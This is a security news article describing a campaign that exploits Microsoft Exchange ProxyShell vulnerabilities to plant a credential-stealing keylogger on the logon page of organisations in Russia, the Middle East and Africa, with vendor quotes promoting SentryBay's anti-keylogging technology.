Cyber Threat Radar – A keylogger malware is being deployed by an unidentified threat actor through the exploitation of well-known security vulnerabilities in Microsoft Exchange Server. These attacks are specifically aimed at entities located in Europe, the Middle East and Africa.
Russian cybersecurity analysts have discovered more than 30 targets encompassing government organizations, financial institutions, technology firms, and educational establishments. The initial breach occurred in 2021, marking the first-ever compromise.
Countries Affected By Keylogger On Microsoft Exchange Server
This particular keylogger was gathering login details and storing them in a file that could be accessed through a unique online pathway. The countries affected by this intrusion campaign include:
Europe
Russia
Middle East
Jordan, Kuwait, Lebanon, Oman, United Arab Emirates
Africa
Ethiopia, Mauritius, Niger, Nigeria
Microsoft Exchange Server ProxyShell Vulnerability Exploited
The attack sequences begin by exploiting the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), which were initially addressed by Microsoft in May 2021. The vulnerabilities, if successfully exploited, could enable an attacker to circumvent authentication, escalate their privileges, and execute remote code without authentication.
The ProxyShell vulnerability is exploited by threat actors who then proceed to insert a keylogger onto the main page of the server (“logon.aspx”). Additionally, they inject code that is designed to capture login credentials and save them to a file that can be accessed from the internet when the sign-in button is clicked.
“As the first known compromise dates back to 2021 this confirms the attackers have been active for a significant period,” said Timothy Jenkins, Head of Cyberdefense Research, SentryBay. “It’s clear the stolen credentials could potentially be used for unauthorized access, data breaches, and further malicious activities.”
SentryBay’s Anti-Keylogging Technology Prevents Unauthorized Access
“The discovery of a keylogger on the Microsoft Exchange Server main page underscores the critical need for robust security measures,” commented Brent Agar, VP Strategic Partnerships, SentryBay. “This incident highlights the vulnerabilities that can be exploited through previously patched flaws like ProxyShell. This new keylogger puts many companies and governments at risk who must remain vigilant and continuously monitor their systems. At SentryBay, we emphasize the importance of proactive security solutions, including our advanced anti-keylogging technology, to protect sensitive information and prevent unauthorized access.”
